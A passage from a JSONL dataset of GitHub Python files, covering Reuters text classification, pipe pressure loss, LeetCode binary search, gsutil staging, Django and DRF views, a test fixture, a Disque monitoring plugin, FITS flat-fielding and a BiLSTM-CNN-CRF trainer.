test_label[random_test_idx]])\r\n #y_test = np.array([np.where(rcv1.target_names == x)[0][0] for x in test_label])\r\n \r\n selected_idx = [y_test[i] in unique_train for i in range(len(y_test))]\r\n X_test = X_test[selected_idx]\r\n y_test = y_test[selected_idx]\r\n \r\n y_train = np.asarray([np.where(unique_train == y)[0][0] for y in y_train])\r\n y_test = np.asarray([np.where(unique_train == y)[0][0] for y in y_test])\r\n \r\n if testOnly == True:\r\n return X_test, y_test\r\n elif validation == True:\r\n from sklearn.model_selection import StratifiedShuffleSplit\r\n sss = StratifiedShuffleSplit(n_splits=1, test_size=2000, random_state=43)\r\n for train_index, valid_index in sss.split(X_train, y_train):\r\n X_train, X_valid = X_train[train_index], X_train[valid_index]\r\n y_train, y_valid = y_train[train_index], y_train[valid_index]\r\n return X_train, X_test, X_valid, y_train, y_test, y_valid\r\n else:\r\n return X_train, X_test, y_train, y_test\r\n\r\nX_train, X_test, X_valid, y_train, y_test, y_valid = getReutersData(testSize=2500)","repo_name":"sjv43/text_classification_reuters_rcv1","sub_path":"RCV1_train_test.py","file_name":"RCV1_train_test.py","file_ext":"py","file_size_in_byte":2899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"30115754200","text":"import argparse\nimport math\nfrom prettytable import PrettyTable\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n#definicion de variables de entrada\nparser = argparse.ArgumentParser(description=\"Programa para el cálculo de presión en una tuberia de dos tramos con diametro distinto.\")\nparser.add_argument(\"-d1\",\"--diametro1\",type=float, help=\"Diametro de primer tramo. (m)\")\nparser.add_argument(\"-d2\",\"--diametro2\",type=float, help=\"Diametro de segundo tramo. (m)\")\nparser.add_argument(\"-q\",\"--caudal\",type=float, help=\"Caudal en la tuberia. (m^3/s)\")\nparser.add_argument(\"-z1\",\"--altura1\",type=float, help=\"Altura de tramo 1. (m)\")\nparser.add_argument(\"-z2\",\"--altura2\",type=float, help=\"Altura de tramo 2. (m)\")\nparser.add_argument(\"-l1\",\"--longitud1\",type=float, help=\"Longitud de tramo 1. (m)\")\nparser.add_argument(\"-l2\",\"--longitud2\",type=float, help=\"Longitud de tramo 2. (m)\")\nargs = parser.parse_args()\n\n#definicion variables predeterminadas\np1=180*(10**3)\ndensidad=997\ng=9.81\n\n#coeficientes de cada material\ncoef={\"Pead\":150,\"Polipropileno\":140,\"AceroGalvanizado\":120,\"Concreto\":130}\n\n#calculo de areas\narea1=math.pi*(args.diametro1**2)/4\narea2=math.pi*(args.diametro2**2)/4\nprint(\"El area del primer tramo es igual a: {:10.4f} m^2\".format(area1))\nprint(\"El area del segundo tramo es igual a: {:10.4f} m^2\\n\".format(area2))\n\n\n#calculo de velocidades\nv1=args.caudal/area1\nv2=args.caudal/area2\nprint(\"El velocidad del primer tramo es igual a: {:10.4f} m/s\".format(v1))\nprint(\"El velocidad del segundo tramo es igual a: {:10.4f} m/s\\n\".format(v2))\n\n#primer tramo\np1pg=(p1/(densidad*g))\nv12g=(0.5*(v1**2)/g)\n\n#segundo tramo\nv22g=(0.5*(v2**2)/g)\n\n#calculo de presion y guardado en diccionario de resultados\nresultados={}\nfor c1 in coef:\n\tfor c2 in coef:\n\t\thf1=args.longitud1*(args.caudal**1.851)/((0.279*coef[c1]*(args.diametro1**2.63)))**1.851\n\t\thf2=args.longitud2*(args.caudal**1.851)/((0.279*coef[c2]*(args.diametro2**2.63)))**1.851\n\t\thftotal=hf2+hf1\n\n\t\tp2=(p1pg+args.altura1+v12g-args.altura2-v22g-hftotal)*densidad*g\n\n\t\tresultados[c1+\"-\"+c2]={\"p2\":p2,\"hf1\":hf1,\"hf2\":hf2,\"deltahf\":hftotal}\n\nprint(\"P2 para las distintas combinaciones:\")\n\n\ntabla = PrettyTable(['Combinación', 'Presión 2',\"Hf1\",\"Hf2\",\"DeltaHf\"])\n\nfor key in resultados:\n\ttabla.add_row([key,'{:10.4f}'.format(resultados[key][\"p2\"]),'{:10.4f}'.format(resultados[key][\"hf1\"]),'{:10.4f}'.format(resultados[key][\"hf2\"]),'{:10.4f}'.format(resultados[key][\"deltahf\"])])\nprint(tabla)\n\nx1=[]\ni=0\nwhile i<((int(args.longitud1)*100)+1):\n\tx1.append(int(i))\n\ti+=1\n\nx2=[]\ni=(args.longitud1*100)+20\nwhile i<((int(args.longitud2)*100)+(int(args.longitud1)*100)+21):\n\tx2.append(int(i))\n\ti+=1\n\nx=x1+x2\n\ni=1\nfor key in resultados:\n\n\t#arrays para graficas\n\tz1y=np.array(([args.altura1]*(int(args.longitud1)*100+1))+([args.altura2]*(int(args.longitud2)*100+1)))\n\tppg=np.array(([p1pg]*(int(args.longitud1)*100+1))+([resultados[key][\"p2\"]/(densidad*g)]*(int(args.longitud2)*100+1)))\n\tv2g=np.array(([v12g]*(int(args.longitud1)*100+1))+([v22g]*(int(args.longitud2)*100+1)))\n\thfcon=np.array(([0]*(int(args.longitud1)*100+1))+([resultados[key][\"deltahf\"]]*(int(args.longitud2)*100+1)))\n\n\n\tplt.figure(i)\n\tplt.suptitle(key)\n\tplt.subplot(4,1,1)\n\tplt.title(\"Altura+P/(p*g)+V/(2*g)+Delta Hf\")\n\tplt.ylabel(\"(m)\")\n\tplt.xlabel(\"Distancia a extremo izquierdo de tuberia. (m)\")\n\tplt.plot(x,z1y+ppg+v2g+hfcon , '-o',markersize=0.1,color=\"blue\")\n\n\tplt.subplot(4,1,2)\n\tplt.title(\"Altura+P/(p*g)+V/(2*g)\")\n\tplt.ylabel(\"(m)\")\n\tplt.xlabel(\"Distancia a extremo izquierdo de tuberia. (m)\")\n\tplt.plot(x, z1y+ppg+v2g, '-o',markersize=0.1,color=\"green\")\n\n\tplt.subplot(4,1,3)\n\tplt.title(\"Altura+P/(p*g)\")\n\tplt.ylabel(\"(m)\")\n\tplt.xlabel(\"Distancia a extremo izquierdo de tuberia. (m)\")\n\tplt.plot(x, z1y+ppg, '-o',markersize=0.1,color=\"red\")\n\n\tplt.subplot(4,1,4)\n\tplt.title(\"Altura\")\n\tplt.ylabel(\"(m)\")\n\tplt.xlabel(\"Distancia a extremo izquierdo de tuberia. (m)\")\n\tplt.plot(x, z1y, '-o',markersize=0.1,color=\"brown\")\n\t\n\ti+=1\n\tplt.tight_layout()\nplt.show()\n\n\n\n\n","repo_name":"sasilva1998/pipe_loss","sub_path":"pipeloss.py","file_name":"pipeloss.py","file_ext":"py","file_size_in_byte":3990,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"22349070526","text":"class Solution:\n def findMin(self, nums: List[int]) -> int:\n minimum = float(inf)\n left, right = 0, len(nums) - 1\n while left <= right:\n if nums[left] < nums[right]:\n minimum = min(minimum, nums[left])\n break\n mid = left + (right - left) // 2\n minimum = min(minimum, nums[mid])\n # mid in first half\n if nums[mid] >= nums[left]:\n left = mid + 1\n # mid in second half\n else:\n right = mid - 1\n return minimum\n\n## Time Complexity: O(log N)\n## Space Complexity: O(1)","repo_name":"priyanka-asnani/Leetcode-Problems","sub_path":"Binary Search/153. Find Minimum in Rotated Sorted Array.py","file_name":"153. Find Minimum in Rotated Sorted Array.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"23412422202","text":"import logging\nfrom . import pwstaging\n\ndef get_stage_cmd(origin, destination):\n\n if origin.endswith('/') or destination.endswith('/'):\n cmd = \"gsutil -m rsync -r {origin} {destination}\"\n else:\n cmd = \"gsutil -m cp -r {origin} {destination}\"\n \n cmd = cmd.format(\n origin = origin, \n destination = destination\n )\n\n return cmd\n\n\nclass PWGsutil(pwstaging.PWStaging):\n \"\"\"\n This staging provider will execute gsutil on worker nodes\n to stage in files from a GCP bucket.\n Worker nodes must be able to authenticate with GCP\n\n It will not handle authentication with GCP. It assumes the nodes \n are already authenticated.\n \"\"\"\n\n def __init__(self, executor_label, logging_level = logging.INFO):\n self.executor_label = executor_label\n self.logging_level = logging_level\n super().__init__('gs', executor_label, logging_level = logging_level)\n\n def replace_task(self, dm, executor, file, f):\n working_dir = dm.dfk.executors[executor].working_dir\n cmd = get_stage_cmd(origin = file.url, destination = file.local_path)\n cmd_id = self._get_cmd_id(cmd) \n return pwstaging.in_task_stage_in_cmd_wrapper(f, file, working_dir, cmd, cmd_id, self.logger.getEffectiveLevel())\n\n def replace_task_stage_out(self, dm, executor, file, f):\n working_dir = dm.dfk.executors[executor].working_dir\n cmd = get_stage_cmd(origin = file.local_path, destination = file.url)\n cmd_id = self._get_cmd_id(cmd) \n return pwstaging.in_task_stage_out_cmd_wrapper(f, file, working_dir, cmd, cmd_id, self.logger.getEffectiveLevel())\n\n","repo_name":"parallelworks/parsl_utils","sub_path":"data_provider/gsutil.py","file_name":"gsutil.py","file_ext":"py","file_size_in_byte":1647,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"24353384300","text":"import datetime\nimport os\n\nfrom .cache_manager import save_cache\nfrom ..ControllerUser import ControllerUser\nfrom ..InData import InData\nfrom ..methods import read_script_lines, apply_txt_extension, safe_get_from_dict, safe_get_alias\nfrom ..path_normalizer import normal_path\n\n\nclass Executor(ControllerUser):\n\n def init(self, name=None):\n init(self.controller, name)\n\n def run(self, name=None):\n run(self.controller, name)\n\n def loop(self, name=None):\n loop(self.controller, name)\n\n def list(self):\n list_executions(self.controller)\n\n def show(self, name=None):\n show_execution_content(self.controller, name)\n\n\ndef init(controller, exec_name=None):\n \"\"\"Starts recording a new execution script\"\"\"\n exec_file_name = apply_txt_extension(exec_name or \"current_exec\")\n exec_file_path = os.path.join(controller.container.execution, exec_file_name)\n\n # write lines to run\n current_file = open(exec_file_path, \"w\")\n while True:\n in_data = InData()\n\n if in_data.first in [\"quit\", \"q\", \"end\"]:\n break\n\n if in_data.line:\n current_file.write(in_data.line + \"\\n\")\n\n current_file.close()\n\n # create executions key if not present in cache file\n if not safe_get_from_dict(controller.data.cache, \"executions\"):\n controller.data.cache[\"executions\"] = {}\n\n # add new key to executions\n safe_get_from_dict(controller.data.cache, \"executions\")[exec_name] = apply_txt_extension(exec_name)\n\n save_cache(controller)\n\n\ndef run(controller, name=None):\n \"\"\"Execute default script or script with name\"\"\"\n exec_file_path = get_exec_file_path(controller, name, \"current_exec\")\n if not exec_file_path:\n return\n\n script_lines = read_script_lines(exec_file_path)\n if not script_lines:\n print(\"no script lines in %s\" % exec_file_path)\n return\n\n controller.checker.run_script_lines(script_lines)\n\n\ndef loop(controller, name=None):\n \"\"\"Execute in loop default script or script with name\"\"\"\n exec_file_path = get_exec_file_path(controller, name, \"current_exec\")\n if not exec_file_path:\n return\n\n script_lines = read_script_lines(exec_file_path)\n if not script_lines:\n print(\"no script lines in %s\" % exec_file_path)\n return\n\n # running script lines\n print(\">>\", \"click enter to execute\", end=' ')\n while True:\n in_data = InData()\n\n if in_data.first in [\"quit\", \"q\", \"end\"]:\n print(\">>\", \"exited execution mode loop\")\n break\n\n # print(\"running scipt\", \"--\", datetime.datetime.now())\n print(\">>\", \"run\", datetime.datetime.now())\n controller.checker.run_script_lines(script_lines)\n\n\ndef show_execution_content(controller, execution_name=None):\n exec_file_path = get_exec_file_path(controller, execution_name, \"current_exec\")\n if not exec_file_path:\n return\n\n with open(exec_file_path) as f:\n lines = f.readlines()\n lines = [line.rstrip() for line in lines]\n\n if not lines:\n print(\"nothing to show\")\n return\n\n for line in lines:\n print(line)\n\n\ndef list_executions(controller):\n executions_map = safe_get_from_dict(controller.data.cache, \"executions\")\n if not executions_map:\n print(\"cannot find executions list in cache data\")\n\n print(\"adding an empty list of executions\")\n controller.data.cache[\"executions\"] = {}\n save_cache(controller)\n\n return\n\n print(\"\", \"executions:\", list(executions_map.keys()))\n\n\ndef get_exec_file_path(controller, name, current_exec):\n \"\"\"Gets the execution or the default file path\"\"\"\n exec_name = safe_get_alias(controller.cache_data, \"executions\", name) if name else current_exec\n if not exec_name:\n print(\"no executions with %s name in cache data\" % name)\n return None\n\n exec_file_path = os.path.join(controller.container.execution, apply_txt_extension(exec_name))\n if not normal_path(exec_file_path) or not normal_path(exec_file_path).exists():\n print(\"no execution files with %s name in cache archive\" % exec_name)\n return None\n\n return exec_file_path","repo_name":"Antond0c/metafolder","sub_path":"control/utils/services/executor.py","file_name":"executor.py","file_ext":"py","file_size_in_byte":4168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"70678872542","text":"from django.shortcuts import render,redirect\nfrom django.http import HttpResponse\nfrom django.views import generic\nfrom django.urls import reverse\nfrom .func import *\nfrom .models import *\n\n# Create your views here.\n\ndef instructor_home(request):\n\n user = request.user\n if(not user.is_authenticated):\n return redirect('/accounts/login')\n if(user.groups.filter(name='Administration').exists()):\n return redirect('/univ/')\n if(user.groups.filter(name='Student').exists()):\n return redirect('/stud/')\n\n if request.method == \"POST\":\n\n if 'sec_query' in request.POST:\n sem = (int)(request.POST.get('semester'))\n name = (str)(request.POST.get('name'))\n return redirect(reverse('instr:sections_view', kwargs={'sem' : sem, 'name' : name}))\n elif 'stud_query' in request.POST:\n cour = (str)(request.POST.get('course'))\n sec = (str)(request.POST.get('section'))\n sem = (int)(request.POST.get('semester2'))\n yr = (int)(request.POST.get('year'))\n return redirect(reverse('instr:student_view', kwargs={'cour' : cour, 'sec' : sec, 'sem' : sem, 'yr' : yr}))\n\n username = request.user.username\n usertype = 'instructor'\n template_name = 'instructor_home.html'\n return render(request, template_name, {'username': username, 'usertype': usertype})\n\ndef sections_view(request, sem, name):\n\n user = request.user\n if(not user.is_authenticated):\n return redirect('/accounts/login')\n if(user.groups.filter(name='Administration').exists()):\n return redirect('/univ/')\n if(user.groups.filter(name='Student').exists()):\n return redirect('/stud/')\n\n template_name = 'sections_view.html'\n usertype = 'instructor'\n section_list = sections_by_prof(sem, name)\n return render(request, template_name, {'section_list' : section_list, 'usertype' : usertype})\n\ndef student_view(request, cour, sec, sem, yr):\n\n user = request.user\n if(not user.is_authenticated):\n return redirect('/accounts/login')\n if(user.groups.filter(name='Administration').exists()):\n return redirect('/univ/')\n if(user.groups.filter(name='Student').exists()):\n return redirect('/stud/')\n\n template_name = 'student_view.html'\n usertype = 'instructor'\n student_list = students_by_section(cour, sec, sem, yr)\n return render(request, template_name, {'student_list' : student_list, 'usertype' : usertype})","repo_name":"Caerii/cs460-backend-webapp","sub_path":"Univ_application/instr/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2474,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"20290150055","text":"class Solution(object):\n def search(self, nums, target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: int\n \"\"\"\n # find the pivot\n left, right = 0, len(nums) - 1\n\n while left < right:\n mid = left + (right - left) // 2\n if nums[mid] >= nums[right]:\n left = mid + 1\n else:\n right = mid\n\n # if the number is within pivot and right, search in this interval\n if nums[left] <= target <= nums[len(nums) - 1]:\n start, end = left, len(nums) - 1\n else:\n # otherwise, serach in other interval\n start, end = 0, left - 1\n\n # conduct regular binary search\n while start <= end:\n mid = start + (end - start) // 2\n if nums[mid] == target:\n return mid\n elif nums[mid] > target:\n end = mid - 1\n else:\n start = mid + 1\n\n return -1\n","repo_name":"h74zhou/leetcode","sub_path":"Medium/33. Search in Rotated Sorted Array.py","file_name":"33. Search in Rotated Sorted Array.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"71040226783","text":"import logging\nimport os\nimport tempfile\nimport unittest\nimport ethereum.keys\nimport shutil\nfrom time import sleep\nfrom pathlib import Path\nfrom golem.core.common import is_windows, is_osx\nfrom golem.core.simpleenv import get_local_datadir\n\nlogger = logging.getLogger(__name__)\n\n\nclass TempDirFixture(unittest.TestCase):\n root_dir = None\n\n @classmethod\n def setUpClass(cls):\n logging.basicConfig(level=logging.DEBUG)\n if cls.root_dir is None:\n if is_osx():\n # Use Golem's working directory in ~/Library/Application Support\n # to avoid issues with mounting directories in Docker containers\n cls.root_dir = os.path.join(get_local_datadir('tests'))\n os.makedirs(cls.root_dir, exist_ok=True)\n else:\n # Select nice root temp dir exactly once.\n cls.root_dir = tempfile.mkdtemp(prefix='golem-tests-')\n if is_windows():\n import win32api\n cls.root_dir = win32api.GetLongPathName(cls.root_dir)\n\n # Concurrent tests will fail\n # @classmethod\n # def tearDownClass(cls):\n # if os.path.exists(cls.root_dir):\n # shutil.rmtree(cls.root_dir)\n\n def setUp(self):\n\n # KeysAuth uses it. Default val (250k+) slows down the tests terribly\n ethereum.keys.PBKDF2_CONSTANTS['c'] = 1\n\n prefix = self.id().rsplit('.', 1)[1] # Use test method name\n self.tempdir = tempfile.mkdtemp(prefix=prefix, dir=self.root_dir)\n self.path = self.tempdir # Alias for legacy tests\n if not is_windows():\n os.chmod(self.tempdir, 0o770)\n self.new_path = Path(self.path)\n\n def tearDown(self):\n # Firstly kill Ethereum node to clean up after it later on.\n try:\n self.__remove_files()\n except OSError as e:\n logger.debug(\"%r\", e, exc_info=True)\n tree = ''\n for path, dirs, files in os.walk(self.path):\n tree += path + '\\n'\n for f in files:\n tree += f + '\\n'\n logger.error(\"Failed to remove files %r\", tree)\n # Tie up loose ends.\n import gc\n gc.collect()\n # On windows there's sometimes a problem with syncing all threads.\n # Try again after 3 seconds\n sleep(3)\n self.__remove_files()\n\n def temp_file_name(self, name: str) -> str:\n return os.path.join(self.tempdir, name)\n\n def additional_dir_content(self, file_num_list, dir_=None, results=None,\n sub_dir=None):\n \"\"\"\n Create recursively additional temporary files in directories in given\n directory.\n For example file_num_list in format [5, [2], [4, []]] will create\n 5 files in self.tempdir directory, and 2 subdirectories - first one will\n contain 2 tempfiles, second will contain 4 tempfiles and an empty\n subdirectory.\n :param file_num_list: list containing number of new files that should\n be created in this directory or list describing file_num_list for\n new inner directories\n :param dir_: directory in which files should be created\n :param results: list of created temporary files\n :return:\n \"\"\"\n if dir_ is None:\n dir_ = self.tempdir\n if sub_dir:\n dir_ = os.path.join(dir_, sub_dir)\n if not os.path.exists(dir_):\n os.makedirs(dir_)\n if results is None:\n results = []\n for el in file_num_list:\n if isinstance(el, int):\n for i in range(el):\n t = tempfile.NamedTemporaryFile(dir=dir_, delete=False)\n results.append(t.name)\n else:\n new_dir = tempfile.mkdtemp(dir=dir_)\n self.additional_dir_content(el, new_dir, results)\n return results\n\n def __remove_files(self):\n if os.path.isdir(self.tempdir):\n shutil.rmtree(self.tempdir)","repo_name":"golemfactory/clay","sub_path":"tests/golem/verifier/test_utils/temp_dir_fixture.py","file_name":"temp_dir_fixture.py","file_ext":"py","file_size_in_byte":4085,"program_lang":"python","lang":"en","doc_type":"code","stars":2915,"dataset":"github-code","pt":"7"} +{"seq_id":"20313246396","text":"import urllib.request\nimport urllib.parse\nimport json\nimport html\n\ndef translate(bot, args):\n\tif len(args) > 2:\n\t\tif \"|\" not in args[1]:\n\t\t\treturn \"Usage: !%s \" % args[0]\n\t\tlang_from, lang_to = args[1].split(\"|\")\n\t\tquery = ' '.join(args[2:])\n\t\tdata = json.load(urllib.request.urlopen('https://www.googleapis.com/language/translate/v2?%s' % urllib.parse.urlencode({'key': bot.config.get('module: translate', 'api_key'), 'q': query, 'source': lang_from, 'target': lang_to}), timeout = 5))\n\t\ttry:\n\t\t\tresponse = html.unescape(data['data']['translations'][0]['translatedText'])\n\t\t\treturn response\n\t\texcept ValueError:\n\t\t\treturn '!%s: le derp' % args[0]\n\telse:\n\t\treturn \"Usage: !%s \" % args[0]\n","repo_name":"milosivanovic/xbot","sub_path":"xbot/modules/translate.py","file_name":"translate.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"7"} +{"seq_id":"15459060602","text":"from sauna.plugins import Plugin, human_to_bytes, bytes_to_human,\\\n PluginRegister\n\nmy_plugin = PluginRegister('Disque')\n\n\n@my_plugin.plugin()\nclass Disque(Plugin):\n\n def __init__(self, config):\n super().__init__(config)\n try:\n import redis\n self.redis = redis\n except ImportError:\n from ... import DependencyError\n raise DependencyError(self.__class__.__name__, 'redis-py',\n 'redis', 'python3-redis')\n self._disque_info = None\n\n @my_plugin.check()\n def used_memory(self, check_config):\n status = self._value_to_status_less(\n self.disque_info['used_memory'], check_config, human_to_bytes\n )\n output = 'Used memory: {}'.format(\n self.disque_info['used_memory_human'])\n return status, output\n\n @my_plugin.check()\n def used_memory_rss(self, check_config):\n status = self._value_to_status_less(\n self.disque_info['used_memory_rss'], check_config, human_to_bytes\n )\n output = 'Used memory RSS: {}'.format(\n bytes_to_human(self.disque_info['used_memory_rss'])\n )\n return status, output\n\n @property\n def disque_info(self):\n if not self._disque_info:\n r = self.redis.StrictRedis(**self.config)\n self._disque_info = r.info()\n return self._disque_info\n\n @my_plugin.check()\n def qlen(self, check_config):\n r = self.redis.StrictRedis(**self.config)\n num_items = r.execute_command('QLEN', check_config['key'])\n status = self._value_to_status_less(num_items, check_config)\n output = '{} items in key {}'.format(num_items, check_config['key'])\n return status, output\n\n @staticmethod\n def config_sample():\n return '''\n # Disque, an in-memory, distributed job queue\n # This is a Redis fork, https://github.com/antirez/disque\n - type: Disque\n checks:\n - type: used_memory\n warn: 128M\n crit: 1024M\n - type: used_memory_rss\n warn: 128M\n crit: 1024M\n # Check the size of a queue\n - type: qlen\n key: my-queue\n warn: 10\n crit: 20\n config:\n host: localhost\n port: 7711\n '''\n","repo_name":"NicolasLM/sauna","sub_path":"sauna/plugins/ext/disque.py","file_name":"disque.py","file_ext":"py","file_size_in_byte":2379,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"7"} +{"seq_id":"26549618565","text":"from rest_framework.response import Response\nfrom ..serializers import PutAuthorSerializer, AuthorInfo\nfrom ..swagger import token_param\nfrom ..common import *\nfrom drf_yasg.utils import swagger_auto_schema\nfrom rest_framework import serializers\nfrom django.db.utils import IntegrityError\nfrom rest_framework.exceptions import NotFound\nimport logging as log\nfrom ..permissions import ReadOnlyPermission\nfrom .viewset import CRUDViewSet\n\n\nclass AuthorsViewSet(CRUDViewSet):\n queryset = Author.objects.all()\n serializer_class = AuthorInfo\n permission_classes = [ReadOnlyPermission]\n pagination_class = PaginationClass\n\n def get_serializer_class(self):\n if self.action == \"create\":\n return PutAuthorSerializer\n else:\n return self.serializer_class\n\n @swagger_auto_schema(\n operation_description=\"Get list of authors\",\n responses={200: AuthorInfo, \"other\": \"something went wrong\"},\n )\n def list(self, request, *args, **kwargs):\n return super().list(request, *args, **kwargs)\n\n @swagger_auto_schema(\n operation_description=\"Create author\",\n responses={201: \"successful\", \"other\": \"something went wrong\"},\n request_body=PutAuthorSerializer,\n manual_parameters=[token_param],\n )\n def create(self, request, *args, **kwargs):\n try:\n return super().create(request, *args, **kwargs)\n except serializers.ValidationError as e:\n log.error(f\"ValidationError: {e}\")\n return Response(status=500)\n except IntegrityError as e:\n if \"FOREIGN KEY constraint failed\" in e.args[0]:\n log.error(e.args[0])\n return Response(\"user not exists\", status=500)\n log.error(e)\n return Response(status=404)\n except Exception as e:\n log.error(f\"Something went wrong {e}\")\n return Response(status=404)\n\n @swagger_auto_schema(\n operation_description=\"Update author\",\n responses={200: \"successful\", \"other\": \"something went wrong\"},\n request_body=AuthorInfo,\n manual_parameters=[token_param],\n )\n def update(self, request, *args, **kwargs):\n try:\n return super().update(request, *args, **kwargs)\n except serializers.ValidationError as e:\n log.error(f\"ValidationError: {e}\")\n return Response(status=500)\n except IntegrityError as e:\n if \"FOREIGN KEY constraint failed\" in e.args[0]:\n log.error(e.args[0])\n return Response(\"user not exists\", status=403)\n log.error(f\"IntegrityError {e}\")\n return Response(status=500)\n except Author.DoesNotExist:\n log.error(\"Author doesn't exist\")\n return Response(status=500)\n except Exception as e:\n log.error(f\"Something went wrong {e}\")\n return Response(status=404)\n\n @swagger_auto_schema(\n operation_description=\"Delete author\",\n responses={204: \"successful\", \"other\": \"something went wrong\"},\n manual_parameters=[token_param],\n )\n def destroy(self, request, *args, **kwargs):\n try:\n return super().destroy(request, *args, **kwargs)\n except Author.DoesNotExist:\n log.error(\"User is not author\")\n return Response(\"User is not author\", status=500)\n except Exception as e:\n log.error(f\"Something went wrong {e}\")\n return Response(status=404)\n","repo_name":"paffel2/news_server_py","sub_path":"news/views/authors.py","file_name":"authors.py","file_ext":"py","file_size_in_byte":3516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"7299400157","text":"import astropy.io.fits as pyfits\nimport numpy as np\nfrom glob import glob\n\n\nfor filename in glob(\"2022*-long.fit*\"):\n last = filename\nwith open(last, 'rb') as f:\n lastf = pyfits.open(f)[0]\n\nshort = []\nfor filename in glob(\"2022*-short.fit*\"):\n short.append(pyfits.getdata(filename))\n\nlong = []\nfor filename in glob(\"2022*-long.fit*\"):\n long.append(pyfits.getdata(filename))\n\nmaster_short = np.mean(short, axis=0)\nmaster_long = np.mean(long, axis=0)\n\nmaster_data = (master_long - master_short).clip(min=0)\nh = pyfits.PrimaryHDU(master_data, header=lastf.header, scale_back=False)\nh.scale('uint16')\nh.header['BZERO'] = 32768\nh.header['BSCALE'] = 1\nh.writeto('master_flat.fit', overwrite=True)\n","repo_name":"pcchou/latte-data-processing","sub_path":"flat_raw_longshort/create_latte_long_short_flat.py","file_name":"create_latte_long_short_flat.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"74127631262","text":"#!/usr/bin/python\n# -*- coding:utf-8 -*-\n\n\"\"\"\n@file: bilstm_cnn_crf.py\n\"\"\"\nimport codecs\nimport pickle\nimport gensim\nfrom keras.layers import *\nfrom keras_contrib.layers import CRF\nfrom keras.models import *\nfrom keras.utils import plot_model\nfrom keras.utils import np_utils\nfrom keras.preprocessing import sequence\nfrom keras.callbacks import ModelCheckpoint\n\nfrom keras.models import model_from_json\n\nnp.random.seed(1111)\n\n\nclass Documents(object):\n def __init__(self, chars, label, index):\n self.chars = chars\n self.label = label\n self.index = index\n\n\n# 训练模型 保存weights\ndef process_train(corpus_path, nb_epoch, base_model_weight=None):\n # ********************** 训练数据预处理 **********************\n\n # 1.读取corpus语料,语料文件夹下各语料文件地址\n raw_train_file = [corpus_path + os.sep + folder + os.sep + file\n for folder in os.listdir(corpus_path)\n for file in os.listdir(corpus_path + os.sep + folder)]\n\n # 2.读取每个语料文件生成train.data, 利用train.data生成训练数据原始格式\n process_data(raw_train_file, 'train.data')\n train_docs = create_docs('train.data')\n print(\"***** 按标点切分后训练数据长度: \", len(train_docs))\n\n # 3.根据语料数据生成词典\n lexicon, lexicon_reverse = get_lexicon(train_docs)\n print(\"***** 生成词典长度: \", len(lexicon))\n\n # 4.load预训练词向量\n embedding_model = gensim.models.Word2Vec.load(r'model_conll_law.m')\n embedding_size = embedding_model.vector_size\n print(\"***** 每个词的词向量维度: \", embedding_size)\n embedding_weights = load_embedding(embedding_model, embedding_size, lexicon_reverse)\n print(\"***** 训练好的词向量维度: \", embedding_weights.shape)\n\n # 5.将训练数据的原始格式转换为字典中的下标表示,并将所有样本按max_len补长\n label_2_index = {'Pad': 0, 'B': 1, 'M': 2, 'E': 3, 'S': 4, 'Unk': 5}\n index_2_label = {0: 'Pad', 1: 'B', 2: 'M', 3: 'E', 4: 'S', 5: 'Unk'}\n train_data_list, train_label_list, train_index_list = create_matrix(train_docs, lexicon, label_2_index)\n max_len = max(map(len, train_data_list))\n print(\"***** 原始数据样本最大长度: \", max_len)\n train_data_array, train_label_list_padding = padding_sentences(train_data_list, train_label_list, max_len)\n print(\"***** 原始数据补长后维度: \", train_data_array.shape)\n # label one-hot化\n train_label_array = np_utils.to_categorical(train_label_list_padding, len(label_2_index)). \\\n reshape((len(train_label_list_padding), len(train_label_list_padding[0]), -1))\n print(\"***** label one-hot后维度: \", train_label_array.shape)\n\n # ********************** 模型搭建和训练 **********************\n\n # 1.搭建BiLSTM-CNN-CRF模型\n model = bilstm_cnn_crf(max_len, len(lexicon), len(label_2_index), embedding_weights)\n print(model.input_shape)\n print(model.output_shape)\n\n plot_model(model, to_file='bilstm_cnn_crf_model.png', show_shapes=True, show_layer_names=True)\n\n if base_model_weight != None and os.path.exists(base_model_weight) == True:\n model.load_weights(base_model_weight)\n\n hist = model.fit(train_data_array, train_label_array, batch_size=256, epochs=nb_epoch, verbose=1)\n\n # model.load_weights('best_val_model.hdf5')\n\n '''\n test_y_pred=model.predict(train_data_array,batch_size=512,verbose=1)\n pred_label=np.argmax(test_y_pred,axis=2)\n print(pred_label[0])\n\n '''\n score = model.evaluate(train_data_array, train_label_array, batch_size=512)\n print(score)\n\n # save model\n model.save_weights('train_model.hdf5')\n\n # save lexicon\n pickle.dump([lexicon, lexicon_reverse, max_len, index_2_label], open('lexicon.pkl', 'wb'))\n\n\n# 读取每个语料文件生成train.data,每个汉字标记类型{Single,Begin,Middle,End}\ndef process_data(file_list, new_file):\n res = codecs.open(new_file, 'w', 'utf-8')\n for file in file_list:\n with codecs.open(file, 'r', 'utf-8') as fs:\n lines = fs.readlines()\n for line in lines:\n word_list = line.strip().split()\n for word in word_list:\n if len(word) == 1:\n res.write(word + '\\tS\\n')\n else:\n res.write(word[0] + '\\tB\\n')\n for w in word[1:-1]:\n res.write(w + '\\tM\\n')\n res.write(word[-1] + '\\tE\\n')\n res.write('\\n')\n res.close()\n\n\n# 